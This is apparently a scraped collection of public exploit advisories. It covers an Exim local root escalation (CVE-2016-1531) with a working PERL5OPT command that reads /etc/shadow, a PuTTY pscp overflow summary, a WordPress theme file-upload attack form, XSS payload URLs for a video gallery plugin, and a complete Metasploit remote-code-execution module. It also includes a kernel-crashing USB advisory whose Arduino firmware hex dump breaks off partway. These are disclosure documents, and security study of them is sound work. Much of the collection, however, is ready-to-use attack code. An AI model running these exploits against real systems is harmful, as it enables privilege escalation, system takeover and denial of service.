To perform the attack, attacker can take advantage of the exim's sendmail 
interface which links to an exim binary that has an SUID bit set on it by 
default as we can see below:

[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim 
lrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim

[dawid@centos7 ~]$ ls -l /usr/sbin/exim
-rwsr-xr-x. 1 root root 1222416 Dec  7  2015 /usr/sbin/exim


Normally, when exim sendmail interface starts up, it drops its root
privileges before giving control to the user (i.e entering mail contents for
sending etc), however an attacker can make use of the following command line 
parameter which is available to all users:

-ps    This  option  applies when an embedded Perl interpreter is linked with 
       Exim. It overrides the setting of the perl_at_start option, forcing the 
       starting of the interpreter to occur as soon as Exim is started.


As we can see from the documentation at:

http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html

the perl_at_start option does the following:

"Setting perl_at_start (a boolean option) in the configuration requests a 
startup when Exim is entered."

Therefore it is possible to force the execution of the perl_startup script
defined in the Exim's main config before exim drops its root privileges.


To exploit this setting and gain the effective root privilege of the SUID binary,
attackers can inject PERL5OPT perl environment variable, which does not get
cleaned by affected versions of Exim.

As per perl documentation, the environment variable allows to set perl command-line 
options (switches). Switches in this variable are treated as if they were on every
Perl command line. 

There are several interesting perl switches that that could be set by attackers to 
trigger code execution. 
One of these is -d switch which forces perl to enter an interactive debug mode 
in which it is possible to take control of the perl application.

An example proof of concept exploit using the -d switch can be found below.


V. PROOF OF CONCEPT ROOT EXPLOIT
-------------------------

[dawid@centos7 ~]$ head /etc/exim/exim.conf 
######################################################################
#                  Runtime configuration file for Exim               #
######################################################################

# Custom filtering via perl
perl_startup = do '/usr/share/exim4/exigrey.pl'

[dawid@centos7 ~]$ exim -bV -v | grep -i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP

[dawid@centos7 ~]$ PERL5OPT="-d/dev/null" /usr/sbin/sendmail.exim -ps victim@localhost

Loading DB routines from perl5db.pl version 1.37
Editor support available.

Enter h or 'h h' for help, or 'man perldebug' for more help.

Debugged program terminated.  Use q to quit or R to restart,
  use o inhibit_exit to avoid stopping after program termination,
  h q, h R or h o to get additional info.  

  DB<1> p system("id");
uid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
0
  DB<2> p system("head /etc/shadow");
root:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7::
[...]


VI. BUSINESS IMPACT
-------------------------

This vulnerability could be exploited by attackers who have local access to the
system to escalate their privileges to root which would allow them to fully
compromise the system.

VII. SYSTEMS AFFECTED
-------------------------

Exim versions before the latest patched version of Exim 4.86.2 are affected by 
this vulnerability, if Exim was compiled with Perl support and the main 
configuration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains 
a perl_startup option e.g:

perl_startup = do '/usr/share/exim4/exigrey.pl'

It is important to note that the file does not necessarily have to exist
to exploit the vulnerability. Although the path must be specified.


VIII. SOLUTION
-------------------------

Update to Exim 4.86.2 which contains the official patch that fixes the
environment sanitization issues.

IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt
http://www.exim.org/
http://www.exim.org/static/doc/CVE-2016-1531.txt
http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html
https://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f

CVE-2016-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531

X. ADVISORY CREATED BY
-------------------------

This advisory has been created by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com

XI. REVISION HISTORY
-------------------------

March 10th, 2016:  Advisory released
March 11th, 2016:  Fixed advisory header,added cve.mitre link of the root issue

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
HireHackking 
Source: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563

Author:     <github.com/tintinweb>
Date:       Feb 20th, 2016
Name:           putty
Vendor:         sgtatham - http://www.chiark.greenend.org.uk/~sgtatham/putty/ 

Version: 0.59 [3] (~9 years ago) <= affected <= 0.66
Platform(s):    win/nix
Technology:     c

Vuln Classes:   stack buffer overwrite (CWE-121)
Origin:         remote
Min. Privs.:    post auth
CVE:            CVE-2016-2563

Summary

The putty SCP command-line utility (pscp) is missing a bounds-check for a stack buffer when processing the SCP-SINK file-size response to a SCP download request. This may allow a malicious server to overwrite the stack buffer within the client- application potentially leading to remote code execution.

PoC attached. patch attached.

Besides that, two minor issues have been reported in putty packet handling:

DoS condition in the parsing of SSH-Strings that lead to a nullptr read. (connect putty to poc.py and type x11exploit to trigger one of multiple occurrence of a crash, also works with x11forwarding disabled in putty)
DoS condition in the handling of unrequested forwarded-tcpip channels open requests that lead to a nullptr read. (connect putty to poc.py and type forwardedtcpipcrash to trigger crash)

Details

The vulnerable code is located in pscp.c [4] line 1498 (HEAD) and is based on an unbound sscanf string format descriptor storing an arbitrary length string in a 40byte fixed size stack buffer sizestr[40].


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39551.zip
HireHackking 
* Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
* Discovery Date: 02.09.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://www.yourinspirationweb.com
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: 1.0.8 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.4.x
 
Description
================================================================================
 The Beauty Premium theme contains a contact form that is vulnerable to CSRF
 and File Upload vulnerability in the sendmail.php file. The file attachment
 gets uploaded to the wordpress upload directory and it is not sanitized,
 allowing attackers to upload harmful code. 
 
 
PoC
================================================================================
Google Dork inurl:themes/beauty-premium/ or detect via WPScan:

<form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
<input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
<input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
<input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
<input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
<textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test&lt;/textarea&gt;
<input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
<li class="submit-button">
<input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
<input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
<input type="hidden" name="id_form" value="test" />
<input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" />			</li>
</form>

You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.
HireHackking 
* Exploit Title: Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities <=8.60
* Discovery Date: 01.05.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://digitalzoomstudio.net/
* Software Link: http://codecanyon.net/item/video-gallery-wordpress-plugin-w-youtube-vimeo-/157782
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: <=8.60
* Tested on: Wordpress 4.2.x-4.4.x
* OVE-20160305-2497


Technical details:

Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
 if(isset($_GET['initer'])){
            $initer = $_GET['initer'];
        }
Line 27 (unsanitized output):
       <?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------       
Unauthenticated CSRF &  XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/tagseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645

Line 13-15 (unsanitized input):
 if(isset($_GET['initer'])){
            $initer = $_GET['initer'];
        }
Line 27 (unsanitized output):
       <?php echo "var initer = '" . $initer . "';"; ?>
--------------------------------------- 
Unauthenticated CSRF & XSS:
POC(s):
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1)<%2fscript>894ba&type=&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=7934f"><script>alert(1)<%2fscript>99085&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=&width=54fd7"><script>alert(1)<%2fscript>4708b

Line 25 & 35 (unsanitized input & direct output):
$w =  $_GET['width'];
<param name="flashvars" value="video=' . $_GET['source'] . '&types=' . $_GET['type'] . '&defaultQuality=hd" width="' . $w . '" height="' . $h . '">'.$backup.'
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP Utility Belt Remote Code Execution',
      'Description'    => %q{
         This module exploits a remote code execution vulnerability in PHP Utility Belt,
         which is a set of tools for PHP developers and should not be installed in a
         production environment, since this application runs arbitrary PHP code as an
         intended functionality.
      },
      'Author'         =>
        [
          'WICS',     # initial discovery
          'Jay Turla' # msf
        ],
      'References'     =>
        [
          ['EDB', '38901'],
          ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
        ],
      'DisclosureDate' => 'Aug 12 2015',
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          ['PHP Utility Belt', {}]
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
      ], self.class)
  end

  def check
    txt = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{txt};")

    if res && res.body.include?(txt)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    http_send_command(payload.encoded)
  end

  def http_send_command(cmd)
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        'code' => cmd
      }
    )
  end

end
HireHackking 
OS-S Security Advisory 2016-17
Linux snd-usb-audio Multiple Free

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes (multiple
free) on invalid USB device descriptors (snd-usb-audio driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net//advisories/OSS-2016-17_snd-usb-audio.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the snd-usb-audio driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Kernel 3.10.0-327.10.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x582
idProduct: 0x0
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1

This is the configuration descriptor containing the malicious value for
bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the
system (multiple free).

[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x3
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc

A Kernel Address Sanitizer (KASan) report is available at https://os-s.net/advisories/OSS-2016-17_KASan_Report.txt.

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this
Security Advisory.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283358

Kernel Stacktrace:

[ 32.951497] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 33.172627] usb 1-1: New USB device found, idVendor=0582, idProduct=0000
[ 33.179073] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 33.186972] usb 1-1: Product: Ä?
[ 33.190732] usb 1-1: Manufacturer: Ä?
[ 33.195718] usb 1-1: SerialNumber: %
[ 33.206296] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
says 96 microframes
[ 33.344127] BUG: unable to handle kernel NULL pointer dereference at
(null)
[ 33.345023] IP: [<ffffffffa041d063>] free_substream.part.0+0x53/0x70
[snd_usb_audio]
[ 33.345023] PGD 0
[ 33.345023] Oops: 0000 [#1] SMP
[ 33.345023] Modules linked in: snd_usb_audio(+) snd_usbmidi_lib snd_hwdep
snd_rawmidi snd_seq snd_seq_device snd_pcm snd_timer snd soundcore
ip6t_rpfilter ip6t_REJECT ipt_REJECT xt_conntrack ebtable_nat ebtable_broute
bridge stp llc ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6
nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw
ip6table_filter ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4
nf_nat_ipv4 nf_nat nf_conntrack iptable_mangle iptable_security iptable_raw
iptable_filter ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm
drm_kms_helper drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs
libcrc32c sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic
pata_acpi ata_piix libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 33.345023] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 33.345023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 33.345023] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 33.345023] RIP: 0010:[<ffffffffa041d063>] [<ffffffffa041d063>]
free_substream.part.0+0x53/0x70 [snd_usb_audio]
[ 33.345023] RSP: 0018:ffff88000bd239b8 EFLAGS: 00010217
[ 33.345023] RAX: ffff88000c53c101 RBX: ffff88000c53c080 RCX: 00000000000067bd
[ 33.345023] RDX: 00000000000067bc RSI: ffffea00002f5400 RDI: ffff88000e401900
[ 33.345023] RBP: ffff88000bd239d8 R08: 0000000000016420 R09: ffff88000fc16420
[ 33.345023] R10: ffffea0000314f00 R11: ffffffffa041d060 R12: 0000000000000000
[ 33.345023] R13: ffff8800000588b8 R14: ffff880000058818 R15: 0000000000000000
[ 33.345023] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 33.345023] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 33.345023] CR2: 0000000000000000 CR3: 000000000bd05000 CR4:
00000000000006f0
[ 33.345023] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 33.345023] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 33.345023] Stack:
[ 33.345023] ffff880000058800 ffff880000058600 0000000000000000 ffff88000c388a68
[ 33.345023] ffff88000bd239f0 ffffffffa041d319 ffffffffa03da0b8 ffff88000bd23a10
[ 33.345023] ffffffffa03c88b8 ffff88000f5c2a80 ffff88000c388980 ffff88000bd23a20
[ 33.345023] Call Trace:
[ 33.345023] [<ffffffffa041d319>] snd_usb_audio_pcm_free+0x69/0x70
[snd_usb_audio]
[ 33.345023] [<ffffffffa03c88b8>] snd_pcm_free+0x58/0x90 [snd_pcm]
[ 33.345023] [<ffffffffa03c8902>] snd_pcm_dev_free+0x12/0x20 [snd_pcm]
[ 33.345023] [<ffffffffa03a2ec9>] __snd_device_free+0x29/0x80 [snd]
[ 33.345023] [<ffffffffa03a319b>] snd_device_free_all+0x3b/0x50 [snd]
[ 33.345023] [<ffffffffa039c8ae>] release_card_device+0x1e/0x80 [snd]
[ 33.345023] [<ffffffff813cdde2>] device_release+0x32/0xa0
[ 33.345023] [<ffffffff812d6efe>] kobject_release+0x7e/0x1b0
[ 33.345023] [<ffffffff812d6db8>] kobject_put+0x28/0x60
[ 33.345023] [<ffffffff813ce107>] put_device+0x17/0x20
[ 33.345023] [<ffffffffa039cb09>] snd_card_free_when_closed+0x29/0x40 [snd]
[ 33.345023] [<ffffffffa039cc64>] snd_card_free+0x54/0x90 [snd]
[ 33.345023] [<ffffffffa041bf83>] ? create_composite_quirk+0x73/0xb0
[snd_usb_audio]
[ 33.345023] [<ffffffffa040e991>] usb_audio_probe+0x251/0x8d0 [snd_usb_audio]
[ 33.345023] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 33.345023] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 33.345023] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 33.345023] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 33.345023] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 33.345023] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 33.345023] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 33.345023] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 33.345023] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 33.345023] [<ffffffffa0437000>] ? 0xffffffffa0436fff
[ 33.345023] [<ffffffffa043701e>] usb_audio_driver_init+0x1e/0x1000
[snd_usb_audio]
[ 33.345023] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 33.345023] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 33.345023] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 33.345023] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 33.345023] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 33.345023] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 33.345023] Code: 0d eb 2e 0f 1f 44 00 00 4c 89 e3 49 89 c4 48 8b 7b 48 e8
81 de d8 e0 48 8b 7b 58 e8 78 de d8 e0 48 89 df e8 70 de d8 e0 4d 39 ec <49>
8b 04 24 75 d7 49 8b be b8 00 00 00 e8 5b de d8 e0 5b 41 5c
[ 33.345023] RIP [<ffffffffa041d063>] free_substream.part.0+0x53/0x70
[snd_usb_audio]
[ 33.345023] RSP <ffff88000bd239b8>
[ 33.345023] CR2: 0000000000000000
[ 33.876830] ---[ end trace b239663354a1c556 ]---
[ 33.882175] Kernel panic - not syncing: Fatal exception
[ 33.883149] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
